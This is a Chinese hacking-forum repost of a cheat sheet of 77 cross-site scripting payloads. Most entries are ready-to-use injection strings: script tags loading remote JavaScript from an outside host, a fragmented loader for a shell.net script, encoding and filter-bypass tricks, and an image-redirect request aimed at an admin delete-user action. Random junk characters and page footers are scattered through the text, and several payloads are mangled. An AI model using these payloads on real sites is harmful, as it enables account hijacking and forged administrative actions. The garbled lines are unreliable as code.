貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。/ y0 {4 j" s) K
(1)普通的XSS JavaScript注入
* q; j E4 {; x& S1 F2 n- H' ]- S<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 S, v/ \. T/ V- X4 {
(2)IMG标签XSS使用JavaScript命令
4 i3 X+ {5 c2 j( }% ^& W9 \<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) [: H2 O8 |6 M: v5 z+ ]+ ?(3)IMG标签无分号无引号: d7 k5 U5 i1 m6 ^
<IMG SRC=javascript:alert(‘XSS’)>5 Z- O- }/ x3 C o% K
(4)IMG标签大小写不敏感; T( Y" K3 ~! R3 E9 o4 @9 }
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>( O3 K; n* s; v
(5)HTML编码(必须有分号)- B$ L& @6 C& R( A) y
<IMG SRC=javascript:alert(“XSS”)>/ c! z- |4 @2 s4 ^# Z
(6)修正缺陷IMG标签
8 P7 M' k% t C0 z8 W% e<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 ~4 Q' P$ V3 C- c8 S2 i. \7 @
7 L3 W2 P$ u5 x9 @, U: Q
" W ?3 W3 V" y4 |(7)formCharCode标签(计算器)
! \- |9 k1 m9 V4 Q9 _# z; |5 i<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 z5 K! Z' D' J/ C V(8)UTF-8的Unicode编码(计算器): _, E, c! }! u$ m+ f: p
<IMG SRC=jav..省略..S')>
" ]7 y, M& F c1 A3 U(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! x: i5 \& I7 c2 ^1 ]<IMG SRC=jav..省略..S')>
9 o) _: f0 b: L0 i3 c(10)十六进制编码也是没有分号(计算器)
i* V! {/ U# U1 N<IMG SRC=java..省略..XSS')>
5 R' R/ A; B K/ [! D$ ^/ j( _3 |(11)嵌入式标签,将Javascript分开
# x7 u; T' m _<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 E- `) ?1 h1 A2 @# a(12)嵌入式编码标签,将Javascript分开
6 m% z" Z. J2 t7 e, ]<IMG SRC=”jav ascript:alert(‘XSS’);”>
z: O+ g8 Z1 \6 @# U/ z(13)嵌入式换行符1 |" i* |6 A( f& ]
<IMG SRC=”jav ascript:alert(‘XSS’);”>, G$ e( p' u7 U; l) T; G% @4 g
(14)嵌入式回车
0 E2 ~# g3 G* [6 }& `8 O" @) G<IMG SRC=”jav ascript:alert(‘XSS’);”>( c% X0 S' @! R5 D! X+ V& t
(15)嵌入式多行注入JavaScript,这是XSS极端的例子5 `+ @8 A8 e% _% B
<IMG SRC=”javascript:alert(‘XSS‘)”>
) t% `. @4 v- o2 D3 f0 t(16)解决限制字符(要求同页面)6 B! T6 g6 D! G3 _3 |' c
<script>z=’document.’</script>
{* [* i5 f; t2 A7 Q9 [<script>z=z+’write(“‘</script>
. K. v* C5 d/ A$ f<script>z=z+’<script’</script>- P4 v V% @/ k' l& r
<script>z=z+’ src=ht’</script>
5 S4 x/ ]$ _ }( Q8 d<script>z=z+’tp://ww’</script>7 y3 b. w" u% H
<script>z=z+’w.shell’</script>
& X! L& ~" C+ O5 H& a2 o& G8 {- i: Z<script>z=z+’.net/1.’</script>6 I: R9 O' ]/ D2 I% V
<script>z=z+’js></sc’</script>
) g7 C) M6 ~$ b0 z" h<script>z=z+’ript>”)’</script>
. C1 P8 f1 _( [) Y& r<script>eval_r(z)</script>
?% U4 C# ^2 Y( A; k' B. b(17)空字符12-7-1 T00LS - Powered by Discuz! Board, F8 T+ L2 Q* [& C4 `
https://www.t00ls.net/viewthread ... table&tid=15267 2/66 w. y: a$ M4 k1 a& _" R) |
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out' S; Q$ y, e1 E( m9 [% C
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 g, J% M) `# \+ g, P
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out5 {: U3 D7 j& J3 x( l) A2 ]' k
(19)Spaces和meta前的IMG标签# ?# y# W* y) B8 a5 }+ s0 Z
<IMG SRC=” javascript:alert(‘XSS’);”>- Y# z* i+ e0 V0 ^% K o
(20)Non-alpha-non-digit XSS
! ?/ Q- w% q( @4 t<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% r7 X" j! b8 y& V
(21)Non-alpha-non-digit XSS to 28 N" A& q3 q/ ]7 h% V; n* S
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
2 ]" k* D4 o: z, F(22)Non-alpha-non-digit XSS to 34 v. x, a% l1 C9 F
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ v+ f" d3 j7 d7 u/ }, f$ B2 h3 a
(23)双开括号* j! B0 i+ {3 E4 Z9 ^
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 ^/ [7 D0 o$ `( p$ U(24)无结束脚本标记(仅火狐等浏览器)
9 ]; k3 [* u3 D! K1 ?<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- O/ e- e0 l. Y0 n$ G(25)无结束脚本标记2
3 _! I0 C: m G# d$ v, o: ]<SCRIPT SRC=//3w.org/XSS/xss.js>& y) }/ p0 L1 A6 K6 [2 z
(26)半开的HTML/JavaScript XSS3 m1 M( q3 z, W5 ?# T2 g% `
<IMG SRC=”javascript:alert(‘XSS’)”, Z3 r( F) d; K; v
(27)双开角括号
8 P$ |, Y2 g2 z<iframe src=http://3w.org/XSS.html <! {/ Y& Y+ I5 x2 \! V, G' x4 y3 `
(28)无单引号 双引号 分号, [4 u. }3 U7 t: T/ [8 [0 L
<SCRIPT>a=/XSS/, x# k$ c3 }# T0 p% {! E
alert(a.source)</SCRIPT>' k; @) Q+ P' R! ]5 q/ }- R8 j ?
(29)换码过滤的JavaScript. `& _6 K+ |/ Y/ V& g) o' U
\”;alert(‘XSS’);//
$ I' h2 _! r" @0 M4 |' I, c(30)结束Title标签
" _* f1 M! a B/ Y7 N</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>+ X( c, @+ U! w& ]: n; G4 I
(31)Input Image" t7 J+ y3 I( p( s& B1 P
<INPUT SRC=”javascript:alert(‘XSS’);”>9 @7 a+ U6 ^, J# c7 _; ?/ H# ?7 o8 b
(32)BODY Image2 o" X6 @; F- u5 k
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 m! R* C$ m0 ?2 {+ _- U(33)BODY标签. t; E$ c: R9 Z/ C8 J
<BODY(‘XSS’)>
) O2 `: r) G6 v. h1 c8 l1 t7 _(34)IMG Dynsrc. c/ Y3 o( r( {- Q* [$ C
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 {9 I: m; G: C) L2 V(35)IMG Lowsrc
8 u8 G1 _; o1 p& v. i5 M5 f* |4 ?<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ C X% E! e/ D. a% {0 p1 c# X
(36)BGSOUND
) f' k+ P+ F+ K# d$ _" W% [" P<BGSOUND SRC=”javascript:alert(‘XSS’);”>) Z l! o0 n5 ^& a% e
(37)STYLE sheet
3 ~/ _3 E6 ~7 |0 F<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 r6 S3 E9 A5 P(38)远程样式表* E2 b. v; w, A$ B
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>& }7 P7 _3 \; G/ F! q
(39)List-style-image(列表式)
) g: \% f- T e- t, E0 d<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 i& B$ ]6 ?7 Y(40)IMG VBscript
7 {1 R, d. U6 o# h<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 n: U$ G) m+ Z1 Z6 i3 p$ N/ }(41)META链接url
* }' i: ^/ G$ o) l- r
. N% L7 \/ v2 U6 e
' c8 B3 X% n! e6 Y. Y<META HTTP-EQUIV=”refresh” CONTENT=”0;
( o% W' @) S# c' }/ H" G4 XURL=http://;URL=javascript:alert(‘XSS’);”>
2 v _0 w7 L# K- @(42)Iframe
3 @. i- i0 v: x<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>, b( W" u* N4 j* }; \
(43)Frame
- n) ^. g" B/ g" v' b, S<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board% c* Q4 \, L3 K# {4 m
https://www.t00ls.net/viewthread ... table&tid=15267 3/61 j1 u P0 ]5 U$ H0 |/ T
(44)Table
8 n6 b: }2 t$ s: j: [; {<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 J* F8 e f/ \- R- K, J0 T' V
(45)TD: N" j z" Q5 e
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
% ?7 J3 v8 W8 N1 B |(46)DIV background-image
" q8 S, j" ?6 a0 C<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; {- ~3 z4 J8 V3 I6 Z3 ?0 ]. V(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
" I3 Z# \' i! i8 e8&13&12288&65279); L' q# j+ v& D; ^4 Z0 Q- O
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" `$ E- S, @, f; b$ G
(48)DIV expression
3 S+ S' ?: W% w<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" |1 \) Q8 m% Q. S8 O7 v(49)STYLE属性分拆表达8 m0 H- V( w; u* H9 K" L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( r+ M# Q O" i0 L% p& G
(50)匿名STYLE(组成:开角号和一个字母开头)
. k* g4 Q) L1 c; D7 j8 D<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>- L9 V; ^2 R% o! j* K) h u5 h
(51)STYLE background-image
1 P1 r1 T* H" |<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A# L/ |% U8 O v! T7 W" h( G
CLASS=XSS></A>8 Q; T! S7 T v4 ^7 V- U
(52)IMG STYLE方式
& c) c# z5 T0 p' ?& F; G" c' f- Bexppression(alert(“XSS”))’>
c( r' e+ ~. \9 e8 x2 m(53)STYLE background
% e) v+ j% N2 A& B1 \<STYLE><STYLE; M7 r, U3 B, l
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>/ u+ t- [1 O2 ~" z
(54)BASE
" _4 ~$ Q0 P7 d0 z+ _<BASE HREF=”javascript:alert(‘XSS’);//”>( e+ ~! `* M7 d( ^7 W
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
B& c2 W0 T+ E& G% z6 L* w5 u<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>' P5 L# ?5 w$ M, w3 \/ |
(56)在flash中使用ActionScrpt可以混进你XSS的代码
+ [9 z* o- O' ca=”get”;
- _. C7 r: v6 L1 mb=”URL(\”";# y0 h# e) n8 a+ j. g: ?+ A6 q
c=”javascript:”;
& u" Z4 f" l" x* Z' |5 Sd=”alert(‘XSS’);\”)”;
/ X+ o5 m! H$ O" K4 peval_r(a+b+c+d);
1 W9 u. b5 a7 Y1 B: s1 r( o(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上, U5 m$ ?* _3 q6 n
<HTML xmlns:xss>- R1 P+ R/ G4 Y9 o
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
8 `9 V Y, l; U<xss:xss>XSS</xss:xss>4 q h! b4 H/ }; n1 a
</HTML>
) G4 v$ [8 N# Q2 o(58)如果过滤了你的JS你可以在图片里添加JS代码来利用& w, N1 X( b/ k2 m
<SCRIPT SRC=””></SCRIPT>
8 [; V. O* w1 A% p+ V1 l(59)IMG嵌入式命令,可执行任意命令$ G0 m" E" P- @8 \9 F
<IMG SRC=”http://www.XXX.com/a.php?a=b”>: y3 E, f7 k L) G! j2 p
(60)IMG嵌入式命令(a.jpg在同服务器)
9 y1 U: t5 M1 J8 B2 C" P8 \Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser( S V/ E3 B$ v; e0 t" ?
(61)绕符号过滤% i0 E. V1 s! i/ \9 d
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>" I4 f, G5 M$ f" W
(62)' d" C* q9 r, X0 O/ G* e/ \
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, |4 h0 @ y" z0 C(63)
4 a5 C) i4 c9 v3 T<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>' ^7 S2 _2 K" s9 q7 M! M
(64)9 [- c0 ~. I$ K6 I- I
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
: I9 k/ ^2 y4 B! @; ~(65)
, L# Y/ v2 d5 D7 D( I3 B8 O<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>" |# F; ?. V. d$ Q
(66)12-7-1 T00LS - Powered by Discuz! Board
4 D0 S. }; q! \* ghttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
; I* t2 Z3 o) n& Z& ?; ?9 Q<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
" S4 f$ G( T+ P% z: X(67)
: \, G7 E9 I" ]* t- a<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
. X+ s& C5 p: z/ h# Q- h. E</SCRIPT>. {$ E" K& U5 k+ @, X1 M/ D
(68)URL绕行
" ? l, Q9 _0 w4 x$ m/ c<A HREF=”http://127.0.0.1/”>XSS</A>
/ o6 @6 m e5 g W4 Q. x, W9 P& X3 V(69)URL编码1 T/ J( i. m9 e
<A HREF=”http://3w.org”>XSS</A>
) V/ Z, k/ N2 T) [! ]/ ^(70)IP十进制/ T" s4 N6 C; x- {& ?
<A HREF=”http://3232235521″>XSS</A>1 C5 J% h2 W. W' o3 e- T
(71)IP十六进制
) r/ q/ U* u- w. Y/ K4 U/ h8 d<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 ]" O: j/ v" _6 e i' ^1 @(72)IP八进制
, {4 k% V8 A( W, D0 ~" Y5 D<A HREF=”http://0300.0250.0000.0001″>XSS</A>
Z3 L2 C) I; X. N# }* K(73)混合编码
& T/ j! o3 I, w, s/ \& Y8 s<A HREF=”h
& m. ?& d y* h0 h, N8 Ftt p://6 6.000146.0×7.147/”">XSS</A>$ ^& E& w. Z! j+ T
(74)节省[http:]
% L! N, H2 o `8 b<A HREF=”//www.google.com/”>XSS</A>
: H3 I. W. _& q/ \9 M(75)节省[www]
' W }* Q- ?$ A$ N<A HREF=”http://google.com/”>XSS</A>
2 ~. W$ B) m. r# B(76)绝对点绝对DNS) T: R) _2 P6 g5 j: }6 ^* a U
<A HREF=”http://www.google.com./”>XSS</A>8 K# d" `# J& L3 ]! ^4 p6 F3 `
(77)javascript链接
4 Z1 }. R' y* L/ ], U- f<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>& M9 [/ ]5 e' U/ `
8 X- `& A+ J5 C! I原文地址:http://fuzzexp.org/u/0day/?p=14
& O0 [5 I# g" u# ]: r$ N: j9 v- f; c+ P) F% Z( X
|
发表于 2013-4-19 19:22:37
收藏
支持
反对